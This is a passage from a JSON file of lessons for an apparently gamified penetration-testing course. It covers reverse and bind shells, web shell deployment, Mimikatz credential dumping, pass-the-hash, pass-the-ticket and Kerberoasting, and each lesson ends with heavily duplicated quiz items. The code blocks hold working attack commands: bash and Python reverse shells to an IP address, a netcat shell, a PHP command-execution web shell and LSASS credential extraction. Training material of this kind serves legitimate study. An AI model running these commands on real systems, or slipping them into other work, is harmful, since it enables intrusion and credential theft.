blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"reverse-shell-techniques","cat":"Exploitation","title":"Reverse Shell Techniques","diff":1,"xp":100,"intro":"A dozen ways to get a callback.","sections":[{"type":"text","content":"Reverse shells connect back to your machine, bypassing inbound firewalls."},{"type":"code","lang":"bash","content":"# Bash\nbash -i >& /dev/tcp/10.10.14.5/4444 0>&1\n# Python\npython3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"10.10.14.5\",4444));[os.dup2(s.fileno(),i) for i in (0,1,2)];pty.spawn(\"/bin/bash\")'"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Why reverse shell over bind?","opts":["Faster","Bypasses inbound firewall rules","Encrypted","Less bandwidth"],"ans":1},{"type":"quiz","q":"The first thing to do after getting a shell is...","opts":["Delete logs","Stabilize the shell and enumerate","Install a rootkit","Launch an attack on another target"],"ans":1},{"type":"quiz","q":"LSASS stores...","opts":["Firewall rules","Cached credentials and tokens","Network config","Registry keys"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"bind-shell-variants","cat":"Exploitation","title":"Bind Shell Variants","diff":1,"xp":75,"intro":"Target listens, you connect.","sections":[{"type":"text","content":"Bind shells open a listening port on the target. Simpler but requires inbound access."},{"type":"code","lang":"bash","content":"# Target\nnc -lvnp 4444 -e /bin/bash\n# Attacker\nnc 10.10.10.5 4444"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Main disadvantage of bind shells?","opts":["Slower","Inbound firewall blocks the port","Can't run commands","Require root"],"ans":1},{"type":"quiz","q":"Lateral movement means...","opts":["Moving to other machines on the network","Physical access","Escalating privileges","Exfiltrating data"],"ans":0},{"type":"quiz","q":"A C2 framework provides...","opts":["Encryption","Command and control of compromised hosts","Vulnerability scanning","Log management"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"web-shell-deployment","cat":"Exploitation","title":"Web Shell Deployment","diff":1,"xp":100,"intro":"Upload a PHP one-liner for persistent command execution.","sections":[{"type":"text","content":"Web shells persist until deleted and blend in with normal web traffic."},{"type":"code","lang":"php","content":"<?php system($_GET['c']); ?>\n// Usage: http://target/shell.php?c=whoami"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Why do web shells evade detection?","opts":["Encrypted","Look like normal HTTP traffic","Use UDP","Run in kernel"],"ans":1},{"type":"quiz","q":"Which tool is best for AD enumeration?","opts":["nmap","BloodHound","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"The first thing to do after getting a shell is...","opts":["Delete logs","Stabilize the shell and enumerate","Install a rootkit","Launch an attack on another target"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"mimikatz-dump","cat":"Post-Exploitation","title":"Mimikatz Credential Dumping","diff":2,"xp":200,"intro":"Extract plaintext passwords from Windows memory.","sections":[{"type":"text","content":"Mimikatz extracts credentials from LSASS process memory."},{"type":"code","lang":"powershell","content":"privilege::debug\nsekurlsa::logonpasswords"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Mimikatz extracts from which process?","opts":["svchost","lsass.exe","explorer","csrss"],"ans":1},{"type":"quiz","q":"LSASS stores...","opts":["Firewall rules","Cached credentials and tokens","Network config","Registry keys"],"ans":1},{"type":"quiz","q":"Lateral movement means...","opts":["Moving to other machines on the network","Physical access","Escalating privileges","Exfiltrating data"],"ans":0},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"pass-the-hash","cat":"Post-Exploitation","title":"Pass the Hash","diff":2,"xp":150,"intro":"Have the hash, don't need the password.","sections":[{"type":"text","content":"NTLM auth uses the hash directly. No cracking needed."},{"type":"code","lang":"bash","content":"psexec.py -hashes aad3b435b51404ee:32ed87bdb5fdc5e9 admin@10.10.10.5"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Why does PtH work?","opts":["NTLM uses the hash directly","Windows stores plaintext","Hash = password","NTLM is unencrypted"],"ans":0},{"type":"quiz","q":"A C2 framework provides...","opts":["Encryption","Command and control of compromised hosts","Vulnerability scanning","Log management"],"ans":1},{"type":"quiz","q":"Which tool is best for AD enumeration?","opts":["nmap","BloodHound","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"pass-the-ticket","cat":"Post-Exploitation","title":"Pass the Ticket","diff":2,"xp":200,"intro":"Steal a Kerberos ticket, inject it on another machine.","sections":[{"type":"text","content":"Kerberos tickets cached in memory. Extract and inject to impersonate users."},{"type":"code","lang":"powershell","content":"sekurlsa::tickets /export\nkerberos::ptt ticket.kirbi"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Two types of Kerberos tickets?","opts":["TGT and TGS","SSL and TLS","NTLM and LM","Session and Persistent"],"ans":0},{"type":"quiz","q":"The first thing to do after getting a shell is...","opts":["Delete logs","Stabilize the shell and enumerate","Install a rootkit","Launch an attack on another target"],"ans":1},{"type":"quiz","q":"LSASS stores...","opts":["Firewall rules","Cached credentials and tokens","Network config","Registry keys"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"kerberoasting","cat":"Post-Exploitation","title":"Kerberoasting","diff":2,"xp":200,"intro":"Any domain user can request service tickets. Crack offline.","sections":[{"type":"text","content":"Request TGS for any SPN. The ticket is encrypted with the service account's hash."},{"type":"code","lang":"bash","content":"GetUserSPNs.py domain/user:pass -dc-ip 10.10.10.5 -request\nhashcat -m 13100 ticket.hash rockyou.txt"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Who can perform Kerberoasting?","opts":["Domain admin","Any authenticated domain user","Only service accounts","Physical access"],"ans":1},{"type":"quiz","q":"Lateral movement means...","opts":["Moving to other machines on the network","Physical access","Escalating privileges","Exfiltrating data"],"ans":0},{"type":"quiz","q":"A C2 framework provides...","opts":["Encryption","Command and control of compromised hosts","Vulnerability scanning","Log management"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"asrep-roasting","cat":"Post-Exploitation","title":"AS-REP Roasting","diff":2,"xp":150,"intro":"Accounts without pre-auth leak their hash to 